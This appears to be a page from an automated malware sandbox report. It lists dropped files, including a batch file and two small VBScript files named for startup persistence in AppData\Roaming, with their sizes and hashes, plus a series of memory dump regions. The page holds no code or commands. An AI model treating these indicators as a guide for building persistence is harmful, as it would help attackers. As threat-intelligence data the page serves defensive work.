C:\Users\Admin\AppData\Roaming\startup_str_248.bat

Filesize
610KB

MD5
624933026776b6141b7ca87c9eccb8d8

SHA1
d7d6388d6266360e14d7c6b56141a92053514387

SHA256
1bb8c8c19237b327822cc6fbc537b9c4d50c549ff15f4e71abf84a2341eec0db

SHA512
2d4617a578a45ee95e958fca89fbcd37882d9ca0d4b9a41e354d2901e3e19b75e9a96b7da5c9e5fdef3c9358bae06529bc3f9e2a74ae83fc3c62ae71a52f8958

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_248.vbs

Filesize
115B

MD5
edf9906f8771607dca50bab144c9a1fd

SHA1
6e3d7fc505c23ad51a36e2329867655f954f5c99

SHA256
8acc6c79f94d5ea50a02bd7aea5a11072e1680c858c5f1f88e7b4543847b0081

SHA512
ce22ca97b3883e01964b47a6678336f0affb8f68c0d3a37396a8e001c03df81f029a6f1ab523c82f145078c4c1640faf9447de8334fadc4cd1bcbead102d8983

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_854.vbs

Filesize
115B

MD5
9a6ff072330a65146eebd4dae8c7812d

SHA1
3695f2c8a53097d1507dc1f642518287541da93b

SHA256
4ddd36786a77babc75f576bbcdf049c5d04c72b1e6e4989503019e611c975347

SHA512
5ce63a38cd2a644a012ed6e9853a39c6113d6f13623200dbc485b5867dc171576b1fafe8fe30103842ddfdcfc39d0c8c7f2a8e45a09c2cbf6f70dc954ace740a

Download Submit
memory/1972-16-0x00007FFD073B0000-0x00007FFD07E71000-memory.dmp

Filesize
10.8MB

Download
memory/1972-27-0x00007FFD073B0000-0x00007FFD07E71000-memory.dmp

Filesize
10.8MB

Download
memory/1972-17-0x00007FFD073B0000-0x00007FFD07E71000-memory.dmp

Filesize
10.8MB

Download
memory/1972-30-0x00007FFD073B0000-0x00007FFD07E71000-memory.dmp

Filesize
10.8MB

Download
memory/2800-13-0x000001B839A70000-0x000001B839A78000-memory.dmp

Filesize
32KB

Download
memory/2800-54-0x00007FFD073B0000-0x00007FFD07E71000-memory.dmp

Filesize
10.8MB

Download
memory/2800-0-0x00007FFD073B3000-0x00007FFD073B5000-memory.dmp

Filesize
8KB

Download
memory/2800-14-0x000001B83BED0000-0x000001B83BF5A000-memory.dmp

Filesize
552KB

Download
memory/2800-12-0x00007FFD073B0000-0x00007FFD07E71000-memory.dmp

Filesize
10.8MB

Download
memory/2800-11-0x00007FFD073B0000-0x00007FFD07E71000-memory.dmp

Filesize
10.8MB

Download
memory/2800-10-0x000001B83BCA0000-0x000001B83BCC2000-memory.dmp

Filesize
136KB

Download
memory/3884-80-0x00000202FDC70000-0x00000202FDC78000-memory.dmp

Filesize
32KB

Download
memory/3884-81-0x00000202FDC80000-0x00000202FDCBC000-memory.dmp

Filesize
240KB

Download
memory/4688-53-0x000001DEEEAB0000-0x000001DEEEACC000-memory.dmp

Filesize
112KB

Download